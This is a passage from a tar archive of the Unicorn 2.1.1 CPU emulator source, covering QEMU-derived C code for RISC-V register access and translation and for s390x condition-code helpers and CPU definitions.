modifying the // move instruction generated by gen_uc_tracecode() that contains // the instruction size to assign the proper size (replacing 0xF1F1F1F1). tcg_op = QTAILQ_NEXT(prev_op, link); } else { // this instruction is the first emulated code ever, // so the instruction operand is the first operand tcg_op = QTAILQ_FIRST(&tcg_ctx->ops); } tcg_op->args[1] = ctx->pc_succ_insn - ctx->base.pc_next; } ctx->base.pc_next = ctx->pc_succ_insn; if (ctx->base.is_jmp == DISAS_NEXT) { target_ulong page_start; page_start = ctx->base.pc_first & TARGET_PAGE_MASK; if (ctx->base.pc_next - page_start >= TARGET_PAGE_SIZE) { ctx->base.is_jmp = DISAS_TOO_MANY; } } } } static void riscv_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; switch (ctx->base.is_jmp) { case DISAS_TOO_MANY: gen_goto_tb(ctx, 0, ctx->base.pc_next); break; case DISAS_NORETURN: break; case DISAS_UC_EXIT: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); gen_helper_uc_riscv_exit(ctx->uc->tcg_ctx, ctx->uc->tcg_ctx->cpu_env); break; default: g_assert_not_reached(); } } static const TranslatorOps riscv_tr_ops = { .init_disas_context = riscv_tr_init_disas_context, .tb_start = riscv_tr_tb_start, .insn_start = riscv_tr_insn_start, .breakpoint_check = riscv_tr_breakpoint_check, .translate_insn = riscv_tr_translate_insn, .tb_stop = riscv_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext ctx; memset(&ctx, 0, sizeof(ctx)); translator_loop(&riscv_tr_ops, &ctx.base, cs, tb, max_insns); } void riscv_translate_init(struct uc_struct *uc) { int i; TCGContext *tcg_ctx = uc->tcg_ctx; /* cpu_gpr[0] is a placeholder for the zero register. Do not use it. 
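Reads of x0 must yield zero and writes to it must be discarded; leaving the slot NULL makes any accidental direct access fault immediately instead of silently corrupting state.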
*/ /* Use the gen_set_gpr and gen_get_gpr helper functions when accessing */ /* registers, unless you specifically block reads/writes to reg 0 */ tcg_ctx->cpu_gpr[0] = NULL; for (i = 1; i < 32; i++) { tcg_ctx->cpu_gpr[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, gpr[i]), riscv_int_regnames[i]); } for (i = 0; i < 32; i++) { tcg_ctx->cpu_fpr[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, fpr[i]), riscv_fpr_regnames[i]); } tcg_ctx->cpu_pc = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, pc), "pc"); tcg_ctx->load_res = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, load_res), "load_res"); tcg_ctx->load_val = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPURISCVState, load_val), "load_val"); } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/unicorn.c�����������������������������������������������������������0000664�0000000�0000000�00000016616�14675241067�0020422�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "uc_priv.h" #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "cpu_bits.h" #include <unicorn/riscv.h> #include "unicorn.h" static int csrno_map[] = { CSR_USTATUS, CSR_UIE, CSR_UTVEC, CSR_USCRATCH, CSR_UEPC, CSR_UCAUSE, CSR_UTVAL, CSR_UIP, CSR_FFLAGS, CSR_FRM, CSR_FCSR, CSR_CYCLE, CSR_TIME, CSR_INSTRET, CSR_HPMCOUNTER3, CSR_HPMCOUNTER4, CSR_HPMCOUNTER5, CSR_HPMCOUNTER6, CSR_HPMCOUNTER7, CSR_HPMCOUNTER8, CSR_HPMCOUNTER9, CSR_HPMCOUNTER10, CSR_HPMCOUNTER11, CSR_HPMCOUNTER12, CSR_HPMCOUNTER13, CSR_HPMCOUNTER14, CSR_HPMCOUNTER15, CSR_HPMCOUNTER16, CSR_HPMCOUNTER17, CSR_HPMCOUNTER18, CSR_HPMCOUNTER19, CSR_HPMCOUNTER20, CSR_HPMCOUNTER21, CSR_HPMCOUNTER22, CSR_HPMCOUNTER23, CSR_HPMCOUNTER24, CSR_HPMCOUNTER25, CSR_HPMCOUNTER26, CSR_HPMCOUNTER27, CSR_HPMCOUNTER28, CSR_HPMCOUNTER29, CSR_HPMCOUNTER30, CSR_HPMCOUNTER31, CSR_CYCLEH, CSR_TIMEH, CSR_INSTRETH, CSR_HPMCOUNTER3H, CSR_HPMCOUNTER4H, CSR_HPMCOUNTER5H, CSR_HPMCOUNTER6H, CSR_HPMCOUNTER7H, CSR_HPMCOUNTER8H, CSR_HPMCOUNTER9H, CSR_HPMCOUNTER10H, CSR_HPMCOUNTER11H, CSR_HPMCOUNTER12H, CSR_HPMCOUNTER13H, CSR_HPMCOUNTER14H, CSR_HPMCOUNTER15H, CSR_HPMCOUNTER16H, CSR_HPMCOUNTER17H, CSR_HPMCOUNTER18H, CSR_HPMCOUNTER19H, CSR_HPMCOUNTER20H, CSR_HPMCOUNTER21H, CSR_HPMCOUNTER22H, CSR_HPMCOUNTER23H, CSR_HPMCOUNTER24H, CSR_HPMCOUNTER25H, CSR_HPMCOUNTER26H, CSR_HPMCOUNTER27H, CSR_HPMCOUNTER28H, CSR_HPMCOUNTER29H, CSR_HPMCOUNTER30H, CSR_HPMCOUNTER31H, CSR_MCYCLE, CSR_MINSTRET, CSR_MCYCLEH, CSR_MINSTRETH, CSR_MVENDORID, CSR_MARCHID, CSR_MIMPID, CSR_MHARTID, CSR_MSTATUS, CSR_MISA, CSR_MEDELEG, CSR_MIDELEG, CSR_MIE, CSR_MTVEC, CSR_MCOUNTEREN, CSR_MSTATUSH, CSR_MUCOUNTEREN, CSR_MSCOUNTEREN, CSR_MHCOUNTEREN, CSR_MSCRATCH, CSR_MEPC, CSR_MCAUSE, CSR_MTVAL, CSR_MIP, CSR_MBADADDR, CSR_SSTATUS, 
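/* reg_read/reg_write index this table with
   (regid - UC_RISCV_REG_USTATUS), so the order here must mirror the
   UC_RISCV_REG_* CSR enumeration exactly */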
CSR_SEDELEG, CSR_SIDELEG, CSR_SIE, CSR_STVEC, CSR_SCOUNTEREN, CSR_SSCRATCH, CSR_SEPC, CSR_SCAUSE, CSR_STVAL, CSR_SIP, CSR_SBADADDR, CSR_SPTBR, CSR_SATP, CSR_HSTATUS, CSR_HEDELEG, CSR_HIDELEG, CSR_HIE, CSR_HCOUNTEREN, CSR_HTVAL, CSR_HIP, CSR_HTINST, CSR_HGATP, CSR_HTIMEDELTA, CSR_HTIMEDELTAH, }; #define csrno_count (sizeof(csrno_map) / sizeof(int)) RISCVCPU *cpu_riscv_init(struct uc_struct *uc); static void riscv_set_pc(struct uc_struct *uc, uint64_t address) { RISCV_CPU(uc->cpu)->env.pc = address; } static uint64_t riscv_get_pc(struct uc_struct *uc) { return RISCV_CPU(uc->cpu)->env.pc; } static void riscv_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; RISCVCPU *cpu = (RISCVCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } } static void reg_reset(struct uc_struct *uc) {} DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPURISCVState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_RISCV_REG_X0 && regid <= UC_RISCV_REG_X31) { #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->gpr[regid - UC_RISCV_REG_X0]; #else CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->gpr[regid - UC_RISCV_REG_X0]; #endif } else if (regid >= UC_RISCV_REG_F0 && regid <= UC_RISCV_REG_F31) { // "ft0".."ft31" CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->fpr[regid - UC_RISCV_REG_F0]; } else if (regid >= UC_RISCV_REG_USTATUS && regid < UC_RISCV_REG_USTATUS + csrno_count) { target_ulong val; int csrno = csrno_map[regid - UC_RISCV_REG_USTATUS]; riscv_csrrw(env, csrno, &val, -1, 0); #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = (uint64_t)val; #else CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = (uint32_t)val; #endif } else { switch (regid) { default: break; case UC_RISCV_REG_PC: #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->pc; #else CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->pc; #endif break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPURISCVState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_RISCV_REG_X0 && regid <= UC_RISCV_REG_X31) { #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); env->gpr[regid - UC_RISCV_REG_X0] = *(uint64_t *)value; #else CHECK_REG_TYPE(uint32_t); env->gpr[regid - UC_RISCV_REG_X0] = *(uint32_t *)value; #endif } else if (regid >= UC_RISCV_REG_F0 && regid <= UC_RISCV_REG_F31) { // "ft0".."ft31" CHECK_REG_TYPE(uint64_t); env->fpr[regid - UC_RISCV_REG_F0] = *(uint64_t *)value; } else if (regid >= UC_RISCV_REG_USTATUS && regid < UC_RISCV_REG_USTATUS + csrno_count) { target_ulong val; int csrno = csrno_map[regid - UC_RISCV_REG_USTATUS]; #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); riscv_csrrw(env, csrno, &val, *(uint64_t *)value, -1); #else CHECK_REG_TYPE(uint32_t); riscv_csrrw(env, csrno, &val, *(uint32_t *)value, -1); #endif } else { switch (regid) { default: break; case UC_RISCV_REG_PC: #ifdef TARGET_RISCV64 CHECK_REG_TYPE(uint64_t); env->pc = *(uint64_t *)value; #else CHECK_REG_TYPE(uint32_t); env->pc = *(uint32_t *)value; #endif *setpc = 1; break; } } return ret; } static bool riscv_stop_interrupt(struct uc_struct *uc, int intno) { // detect stop exception switch (intno) { default: return false; case 
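/* the synthetic exception used by the uc_riscv_exit helper to end
   emulation cleanly */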
RISCV_EXCP_UNICORN_END: return true; case RISCV_EXCP_BREAKPOINT: uc->invalid_error = UC_ERR_EXCEPTION; return true; } } static bool riscv_insn_hook_validate(uint32_t insn_enum) { return false; } static int riscv_cpus_init(struct uc_struct *uc, const char *cpu_model) { RISCVCPU *cpu; cpu = cpu_riscv_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->release = riscv_release; uc->set_pc = riscv_set_pc; uc->get_pc = riscv_get_pc; uc->stop_interrupt = riscv_stop_interrupt; uc->insn_hook_validate = riscv_insn_hook_validate; uc->cpus_init = riscv_cpus_init; uc->cpu_context_size = offsetof(CPURISCVState, rdtime_fn); uc_common_init(uc); } ������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/unicorn.h�����������������������������������������������������������0000664�0000000�0000000�00000001542�14675241067�0020417�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #ifndef UC_QEMU_TARGET_RISCV_H #define UC_QEMU_TARGET_RISCV_H // functions to read & write registers uc_err reg_read_riscv32(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_riscv64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_riscv32(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_riscv64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_riscv32(struct uc_struct *uc); void uc_init_riscv64(struct uc_struct *uc); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016327�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cc_helper.c���������������������������������������������������������0000664�0000000�0000000�00000030431�14675241067�0020420�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 condition code helper routines * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2009 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the 
terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "tcg_s390x.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" /* #define DEBUG_HELPER */ #ifdef DEBUG_HELPER #define HELPER_LOG(x, ...) qemu_log(x) #else #define HELPER_LOG(x, ...) #endif static uint32_t cc_calc_ltgt_32(int32_t src, int32_t dst) { if (src == dst) { return 0; } else if (src < dst) { return 1; } else { return 2; } } static uint32_t cc_calc_ltgt0_32(int32_t dst) { return cc_calc_ltgt_32(dst, 0); } static uint32_t cc_calc_ltgt_64(int64_t src, int64_t dst) { if (src == dst) { return 0; } else if (src < dst) { return 1; } else { return 2; } } static uint32_t cc_calc_ltgt0_64(int64_t dst) { return cc_calc_ltgt_64(dst, 0); } static uint32_t cc_calc_ltugtu_32(uint32_t src, uint32_t dst) { if (src == dst) { return 0; } else if (src < dst) { return 1; } else { return 2; } } static uint32_t cc_calc_ltugtu_64(uint64_t src, uint64_t dst) { if (src == dst) { return 0; } else if (src < dst) { return 1; } else { return 2; } } static uint32_t cc_calc_tm_32(uint32_t val, uint32_t mask) { uint32_t r = val & mask; if (r == 0) { return 0; } else if (r == mask) { return 3; } else { return 1; } } static uint32_t cc_calc_tm_64(uint64_t val, uint64_t mask) { uint64_t r = val & mask; if (r == 0) { return 0; } else if (r == mask) { return 3; } else { int top = clz64(mask); if ((int64_t)(val << top) < 0) { return 2; } else { return 1; } } } static uint32_t cc_calc_nz(uint64_t dst) { return !!dst; } static uint32_t cc_calc_add_64(int64_t a1, int64_t a2, int64_t ar) { if ((a1 > 0 && a2 > 0 && ar < 0) || (a1 < 0 && a2 < 0 && ar > 0)) { return 3; /* overflow */ } else { if (ar < 0) { return 1; } else if (ar > 0) { return 2; } else { return 0; } } } static uint32_t cc_calc_addu_64(uint64_t a1, uint64_t a2, uint64_t ar) { return (ar != 0) + 2 * (ar < a1); } static uint32_t cc_calc_addc_64(uint64_t a1, uint64_t a2, uint64_t ar) { /* Recover a2 + carry_in. */ uint64_t a2c = ar - a1; /* Check for a2+carry_in overflow, then a1+a2c overflow. 
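Since ar == a1 + a2 + carry_in (mod 2^64), a2c == a2 + carry_in; a2c < a2 can only hold if that inner addition wrapped, and ar < a1 only if adding a2c to a1 wrapped, so the disjunction is exactly the carry out of the three-way sum.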
*/ int carry_out = (a2c < a2) || (ar < a1); return (ar != 0) + 2 * carry_out; } static uint32_t cc_calc_sub_64(int64_t a1, int64_t a2, int64_t ar) { if ((a1 > 0 && a2 < 0 && ar < 0) || (a1 < 0 && a2 > 0 && ar > 0)) { return 3; /* overflow */ } else { if (ar < 0) { return 1; } else if (ar > 0) { return 2; } else { return 0; } } } static uint32_t cc_calc_subu_64(uint64_t a1, uint64_t a2, uint64_t ar) { if (ar == 0) { return 2; } else { if (a2 > a1) { return 1; } else { return 3; } } } static uint32_t cc_calc_subb_64(uint64_t a1, uint64_t a2, uint64_t ar) { int borrow_out; if (ar != a1 - a2) { /* difference means borrow-in */ borrow_out = (a2 >= a1); } else { borrow_out = (a2 > a1); } return (ar != 0) + 2 * !borrow_out; } static uint32_t cc_calc_abs_64(int64_t dst) { if ((uint64_t)dst == 0x8000000000000000ULL) { return 3; } else if (dst) { return 2; } else { return 0; } } static uint32_t cc_calc_nabs_64(int64_t dst) { return !!dst; } static uint32_t cc_calc_comp_64(int64_t dst) { if ((uint64_t)dst == 0x8000000000000000ULL) { return 3; } else if (dst < 0) { return 1; } else if (dst > 0) { return 2; } else { return 0; } } static uint32_t cc_calc_add_32(int32_t a1, int32_t a2, int32_t ar) { if ((a1 > 0 && a2 > 0 && ar < 0) || (a1 < 0 && a2 < 0 && ar > 0)) { return 3; /* overflow */ } else { if (ar < 0) { return 1; } else if (ar > 0) { return 2; } else { return 0; } } } static uint32_t cc_calc_addu_32(uint32_t a1, uint32_t a2, uint32_t ar) { return (ar != 0) + 2 * (ar < a1); } static uint32_t cc_calc_addc_32(uint32_t a1, uint32_t a2, uint32_t ar) { /* Recover a2 + carry_in. */ uint32_t a2c = ar - a1; /* Check for a2+carry_in overflow, then a1+a2c overflow. */ int carry_out = (a2c < a2) || (ar < a1); return (ar != 0) + 2 * carry_out; } static uint32_t cc_calc_sub_32(int32_t a1, int32_t a2, int32_t ar) { if ((a1 > 0 && a2 < 0 && ar < 0) || (a1 < 0 && a2 > 0 && ar > 0)) { return 3; /* overflow */ } else { if (ar < 0) { return 1; } else if (ar > 0) { return 2; } else { return 0; } } } static uint32_t cc_calc_subu_32(uint32_t a1, uint32_t a2, uint32_t ar) { if (ar == 0) { return 2; } else { if (a2 > a1) { return 1; } else { return 3; } } } static uint32_t cc_calc_subb_32(uint32_t a1, uint32_t a2, uint32_t ar) { int borrow_out; if (ar != a1 - a2) { /* difference means borrow-in */ borrow_out = (a2 >= a1); } else { borrow_out = (a2 > a1); } return (ar != 0) + 2 * !borrow_out; } static uint32_t cc_calc_abs_32(int32_t dst) { if ((uint32_t)dst == 0x80000000UL) { return 3; } else if (dst) { return 2; } else { return 0; } } static uint32_t cc_calc_nabs_32(int32_t dst) { return !!dst; } static uint32_t cc_calc_comp_32(int32_t dst) { if ((uint32_t)dst == 0x80000000UL) { return 3; } else if (dst < 0) { return 1; } else if (dst > 0) { return 2; } else { return 0; } } /* calculate condition code for insert character under mask insn */ static uint32_t cc_calc_icm(uint64_t mask, uint64_t val) { if ((val & mask) == 0) { return 0; } else { int top = clz64(mask); if ((int64_t)(val << top) < 0) { return 1; } else { return 2; } } } static uint32_t cc_calc_sla(uint64_t src, int shift) { uint64_t mask = -1ULL << (63 - shift); uint64_t sign = 1ULL << 63; uint64_t match; int64_t r; /* Check if the sign bit stays the same. */ if (src & sign) { match = mask; } else { match = 0; } if ((src & mask) != match) { /* Overflow. */ return 3; } r = ((src << shift) & ~sign) | (src & sign); if (r == 0) { return 0; } else if (r < 0) { return 1; } return 2; } static uint32_t cc_calc_flogr(uint64_t dst) { return dst ? 
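/* FLOGR: cc 2 when a one bit was found, cc 0 when the operand was
   all zeros */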
2 : 0; } static uint32_t cc_calc_lcbb(uint64_t dst) { return dst == 16 ? 0 : 3; } static uint32_t cc_calc_vc(uint64_t low, uint64_t high) { if (high == -1ull && low == -1ull) { /* all elements match */ return 0; } else if (high == 0 && low == 0) { /* no elements match */ return 3; } else { /* some elements but not all match */ return 1; } } static uint32_t do_calc_cc(CPUS390XState *env, uint32_t cc_op, uint64_t src, uint64_t dst, uint64_t vr) { uint32_t r = 0; switch (cc_op) { case CC_OP_CONST0: case CC_OP_CONST1: case CC_OP_CONST2: case CC_OP_CONST3: /* cc_op value _is_ cc */ r = cc_op; break; case CC_OP_LTGT0_32: r = cc_calc_ltgt0_32(dst); break; case CC_OP_LTGT0_64: r = cc_calc_ltgt0_64(dst); break; case CC_OP_LTGT_32: r = cc_calc_ltgt_32(src, dst); break; case CC_OP_LTGT_64: r = cc_calc_ltgt_64(src, dst); break; case CC_OP_LTUGTU_32: r = cc_calc_ltugtu_32(src, dst); break; case CC_OP_LTUGTU_64: r = cc_calc_ltugtu_64(src, dst); break; case CC_OP_TM_32: r = cc_calc_tm_32(src, dst); break; case CC_OP_TM_64: r = cc_calc_tm_64(src, dst); break; case CC_OP_NZ: r = cc_calc_nz(dst); break; case CC_OP_ADD_64: r = cc_calc_add_64(src, dst, vr); break; case CC_OP_ADDU_64: r = cc_calc_addu_64(src, dst, vr); break; case CC_OP_ADDC_64: r = cc_calc_addc_64(src, dst, vr); break; case CC_OP_SUB_64: r = cc_calc_sub_64(src, dst, vr); break; case CC_OP_SUBU_64: r = cc_calc_subu_64(src, dst, vr); break; case CC_OP_SUBB_64: r = cc_calc_subb_64(src, dst, vr); break; case CC_OP_ABS_64: r = cc_calc_abs_64(dst); break; case CC_OP_NABS_64: r = cc_calc_nabs_64(dst); break; case CC_OP_COMP_64: r = cc_calc_comp_64(dst); break; case CC_OP_ADD_32: r = cc_calc_add_32(src, dst, vr); break; case CC_OP_ADDU_32: r = cc_calc_addu_32(src, dst, vr); break; case CC_OP_ADDC_32: r = cc_calc_addc_32(src, dst, vr); break; case CC_OP_SUB_32: r = cc_calc_sub_32(src, dst, vr); break; case CC_OP_SUBU_32: r = cc_calc_subu_32(src, dst, vr); break; case CC_OP_SUBB_32: r = cc_calc_subb_32(src, dst, vr); break; case CC_OP_ABS_32: r = cc_calc_abs_32(dst); break; case CC_OP_NABS_32: r = cc_calc_nabs_32(dst); break; case CC_OP_COMP_32: r = cc_calc_comp_32(dst); break; case CC_OP_ICM: r = cc_calc_icm(src, dst); break; case CC_OP_SLA: r = cc_calc_sla(src, dst); break; case CC_OP_FLOGR: r = cc_calc_flogr(dst); break; case CC_OP_LCBB: r = cc_calc_lcbb(dst); break; case CC_OP_VC: r = cc_calc_vc(src, dst); break; case CC_OP_NZ_F32: r = set_cc_nz_f32(dst); break; case CC_OP_NZ_F64: r = set_cc_nz_f64(dst); break; case CC_OP_NZ_F128: r = set_cc_nz_f128(make_float128(src, dst)); break; default: cpu_abort(env_cpu(env), "Unknown CC operation: %s\n", cc_name(cc_op)); } HELPER_LOG("%s: %15s 0x%016lx 0x%016lx 0x%016lx = %d\n", __func__, cc_name(cc_op), src, dst, vr, r); return r; } uint32_t calc_cc(CPUS390XState *env, uint32_t cc_op, uint64_t src, uint64_t dst, uint64_t vr) { return do_calc_cc(env, cc_op, src, dst, vr); } uint32_t HELPER(calc_cc)(CPUS390XState *env, uint32_t cc_op, uint64_t src, uint64_t dst, uint64_t vr) { return do_calc_cc(env, cc_op, src, dst, vr); } #ifndef CONFIG_USER_ONLY void HELPER(load_psw)(CPUS390XState *env, uint64_t mask, uint64_t addr) { load_psw(env, mask, addr); cpu_loop_exit(env_cpu(env)); } void HELPER(sacf)(CPUS390XState *env, uint64_t a1) { HELPER_LOG("%s: %16" PRIx64 "\n", __func__, a1); switch (a1 & 0xf00) { case 0x000: env->psw.mask &= ~PSW_MASK_ASC; env->psw.mask |= PSW_ASC_PRIMARY; break; case 0x100: env->psw.mask &= ~PSW_MASK_ASC; env->psw.mask |= PSW_ASC_SECONDARY; break; case 0x300: env->psw.mask &= ~PSW_MASK_ASC; 
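/* 0x300 selects home-space mode; 0x200 (access-register mode) is not
   handled and falls through to the specification exception below,
   matching the missing PSW_ASC_ACCREG support in cpu_mmu_index() */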
env->psw.mask |= PSW_ASC_HOME; break; default: HELPER_LOG("unknown sacf mode: %" PRIx64 "\n", a1); tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } } #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu-param.h���������������������������������������������������������0000664�0000000�0000000�00000000517�14675241067�0020370�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 cpu parameters for qemu. * * Copyright (c) 2009 Ulrich Hecht * SPDX-License-Identifier: GPL-2.0+ */ #ifndef S390_CPU_PARAM_H #define S390_CPU_PARAM_H 1 #define TARGET_LONG_BITS 64 #define TARGET_PAGE_BITS 12 #define TARGET_PHYS_ADDR_SPACE_BITS 64 #define TARGET_VIRT_ADDR_SPACE_BITS 64 #define NB_MMU_MODES 4 #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu-qom.h�����������������������������������������������������������0000664�0000000�0000000�00000003563�14675241067�0020070�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU S/390 CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_S390_CPU_QOM_H #define QEMU_S390_CPU_QOM_H #include "hw/core/cpu.h" #define S390_CPU(obj) ((S390CPU *)obj) #define S390_CPU_CLASS(klass) ((S390CPUClass *)klass) #define S390_CPU_GET_CLASS(obj) (&((S390CPU *)obj)->cc) typedef struct S390CPUModel S390CPUModel; typedef struct S390CPUDef S390CPUDef; typedef enum cpu_reset_type { S390_CPU_RESET_NORMAL, S390_CPU_RESET_INITIAL, S390_CPU_RESET_CLEAR, } cpu_reset_type; /** * S390CPUClass: * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * @load_normal: Performs a load normal. * @cpu_reset: Performs a CPU reset. * @initial_cpu_reset: Performs an initial CPU reset. * * An S/390 CPU model. 
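 * In this port the normal, initial and clear resets are collapsed into
 * the single reset() callback below, selected by a cpu_reset_type
 * argument; a caller invokes a given flavour as, e.g.:
 *   S390_CPU_GET_CLASS(cs)->reset(cs, S390_CPU_RESET_INITIAL);
 * (see the s390_do_cpu_*_reset helpers in cpu.h).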
*/ typedef struct S390CPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ const S390CPUDef *cpu_def; bool is_static; // const char *desc; qq void (*load_normal)(CPUState *cpu); void (*reset)(CPUState *cpu, cpu_reset_type type); void (*parent_reset)(CPUState *cpu); } S390CPUClass; typedef struct S390CPU S390CPU; typedef struct CPUS390XState CPUS390XState; #endif ���������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu.c���������������������������������������������������������������0000664�0000000�0000000�00000016617�14675241067�0017275�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU S/390 CPU * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2011 Alexander Graf * Copyright (c) 2012 SUSE LINUX Products GmbH * Copyright (c) 2012 IBM Corp. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/timer.h" #include "sysemu/sysemu.h" #include "sysemu/tcg.h" #include "fpu/softfloat-helpers.h" #include "exec/exec-all.h" #define CR0_RESET 0xE0UL #define CR14_RESET 0xC2000000UL; static void s390_cpu_set_pc(CPUState *cs, vaddr value) { S390CPU *cpu = S390_CPU(cs); cpu->env.psw.addr = value; } static bool s390_cpu_has_work(CPUState *cs) { S390CPU *cpu = S390_CPU(cs); #if 0 /* STOPPED cpus can never wake up */ if (s390_cpu_get_state(cpu) != S390_CPU_STATE_LOAD && s390_cpu_get_state(cpu) != S390_CPU_STATE_OPERATING) { return false; } #endif if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) { return false; } return s390_cpu_has_int(cpu); } /* S390CPUClass::reset() */ static void s390_cpu_reset(CPUState *dev, cpu_reset_type type) { CPUState *s = CPU(dev); S390CPU *cpu = S390_CPU(s); S390CPUClass *scc = S390_CPU_GET_CLASS(cpu); CPUS390XState *env = &cpu->env; scc->parent_reset(dev); cpu->env.sigp_order = 0; s390_cpu_set_state(S390_CPU_STATE_STOPPED, cpu); switch (type) { case S390_CPU_RESET_CLEAR: memset(env, 0, offsetof(CPUS390XState, start_initial_reset_fields)); /* fall through */ case S390_CPU_RESET_INITIAL: /* initial reset does not clear everything! 
